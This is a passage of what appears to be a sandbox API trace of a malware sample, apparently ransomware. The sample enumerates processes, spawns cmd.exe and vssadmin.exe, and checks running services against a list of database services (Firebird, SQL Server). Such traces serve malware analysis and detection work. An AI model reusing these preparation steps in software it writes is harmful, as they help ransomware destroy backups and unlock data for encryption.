astrology.exe")) returned 1 [0040.675] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0040.675] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0040.676] lstrlenW (lpString="cottage.exe") returned 11 [0040.676] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0040.934] lstrlenW (lpString="pairs_spec.exe") returned 14 [0040.935] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0041.008] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0041.008] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0041.009] lstrlenW (lpString="observationshairy.exe") returned 21 [0041.009] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0041.010] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0041.010] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0041.010] lstrlenW (lpString="spectrum.exe") returned 12 [0041.010] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0041.011] lstrlenW (lpString="dies.exe") returned 8 [0041.011] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0041.012] lstrlenW (lpString="configured.exe") returned 14 [0041.012] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0041.012] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0041.013] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0041.013] lstrlenW (lpString="fast.exe") returned 8 [0041.013] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0041.014] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0041.014] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0041.015] lstrlenW (lpString="review.exe") returned 10 [0041.015] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0041.015] lstrlenW (lpString="historybinding.exe") returned 18 [0041.016] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0041.016] lstrlenW (lpString="pk task surge.exe") returned 17 [0041.016] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0041.017] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0041.017] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0041.018] lstrlenW (lpString="mobsync.exe") returned 11 [0041.018] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0041.018] lstrlenW (lpString="ivttvf.exe") returned 10 [0041.018] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0041.019] lstrlenW (lpString="cmd.exe") returned 7 [0041.019] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0041.020] lstrlenW (lpString="conhost.exe") returned 11 [0041.020] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0041.021] lstrlenW (lpString="vssadmin.exe") returned 12 [0041.021] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0041.021] lstrlenW (lpString="VSSVC.exe") returned 9 [0041.021] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0041.022] CloseHandle (hObject=0x1f8) returned 1 [0041.022] Sleep (dwMilliseconds=0x1f4) [0041.760] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5effa8 [0041.761] EnumServicesStatusExW (in: hSCManager=0x5effa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0041.761] GetLastError () returned 0xea [0041.761] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x123e) returned 0x396ed68 [0041.761] EnumServicesStatusExW (in: hSCManager=0x5effa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x396ed68, cbBufSize=0x123e, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x396ed68, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0041.762] CloseServiceHandle (hSCObject=0x5effa8) returned 1 [0041.762] lstrlenW (lpString="Appinfo") returned 7 [0041.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0041.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0041.762] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0041.762] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0041.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0041.762] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0041.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.762] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0041.762] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0041.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0041.762] lstrlenW (lpString="AudioSrv") returned 8 [0041.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0041.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0041.762] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0041.762] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0041.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0041.762] lstrlenW (lpString="BFE") returned 3 [0041.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0041.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0041.762] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0041.762] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0041.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0041.762] lstrlenW (lpString="CryptSvc") returned 8 [0041.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0041.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0041.763] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0041.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0041.763] lstrlenW (lpString="CscService") returned 10 [0041.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0041.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0041.763] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0041.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0041.763] lstrlenW (lpString="DcomLaunch") returned 10 [0041.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0041.763] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0041.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0041.763] lstrlenW (lpString="Dhcp") returned 4 [0041.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0041.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0041.763] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0041.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0041.763] lstrlenW (lpString="Dnscache") returned 8 [0041.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0041.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0041.763] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0041.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0041.763] lstrlenW (lpString="DPS") returned 3 [0041.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0041.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0041.763] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0041.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0041.763] lstrlenW (lpString="eventlog") returned 8 [0041.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0041.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0041.763] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0041.764] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0041.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0041.764] lstrlenW (lpString="EventSystem") returned 11 [0041.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0041.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0041.764] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0041.764] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0041.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0041.764] lstrlenW (lpString="gpsvc") returned 5 [0041.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0041.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0041.764] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0041.764] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0041.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0041.764] lstrlenW (lpString="iphlpsvc") returned 8 [0041.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.764] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0041.764] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0041.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0041.764] lstrlenW (lpString="LanmanServer") returned 12 [0041.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0041.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0041.764] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0041.764] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0041.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0041.764] lstrlenW (lpString="LanmanWorkstation") returned 17 [0041.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.764] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0041.764] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0041.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0041.764] lstrlenW (lpString="lmhosts") returned 7 [0041.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0041.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0041.765] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0041.765] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0041.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0041.765] lstrlenW (lpString="MMCSS") returned 5 [0041.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0041.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0041.765] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0041.765] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0041.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0041.765] lstrlenW (lpString="MpsSvc") returned 6 [0041.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0041.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0041.765] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0041.765] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0041.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0041.765] lstrlenW (lpString="Netman") returned 6 [0041.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0041.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0041.765] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0041.765] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0041.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0041.765] lstrlenW (lpString="netprofm") returned 8 [0041.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0041.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0041.765] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0041.765] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0041.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0041.765] lstrlenW (lpString="NlaSvc") returned 6 [0041.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0041.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0041.765] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0041.765] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0041.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0041.766] lstrlenW (lpString="nsi") returned 3 [0041.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0041.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0041.766] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0041.766] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0041.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0041.766] lstrlenW (lpString="PcaSvc") returned 6 [0041.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0041.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0041.766] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0041.766] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0041.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0041.766] lstrlenW (lpString="PlugPlay") returned 8 [0041.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0041.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0041.766] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0041.766] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0041.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0041.766] lstrlenW (lpString="Power") returned 5 [0041.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0041.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0041.766] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0041.766] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0041.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0041.766] lstrlenW (lpString="ProfSvc") returned 7 [0041.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0041.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0041.766] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0041.766] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0041.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0041.766] lstrlenW (lpString="RpcEptMapper") returned 12 [0041.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.766] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0041.766] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0041.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0041.766] lstrlenW (lpString="RpcSs") returned 5 [0041.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0041.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0041.767] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0041.767] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0041.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0041.767] lstrlenW (lpString="SamSs") returned 5 [0041.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0041.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0041.767] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0041.767] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0041.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0041.767] lstrlenW (lpString="Schedule") returned 8 [0041.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0041.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0041.767] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0041.767] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0041.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0041.767] lstrlenW (lpString="SENS") returned 4 [0041.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0041.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0041.767] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0041.767] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0041.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0041.767] lstrlenW (lpString="ShellHWDetection") returned 16 [0041.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.767] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0041.767] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0041.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0041.767] lstrlenW (lpString="Spooler") returned 7 [0041.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0041.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0041.767] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0041.767] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0041.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0041.767] lstrlenW (lpString="SysMain") returned 7 [0041.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0041.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0041.768] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0041.768] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0041.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0041.768] lstrlenW (lpString="Themes") returned 6 [0041.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0041.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0041.768] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0041.768] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0041.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0041.768] lstrlenW (lpString="TrkWks") returned 6 [0041.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0041.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 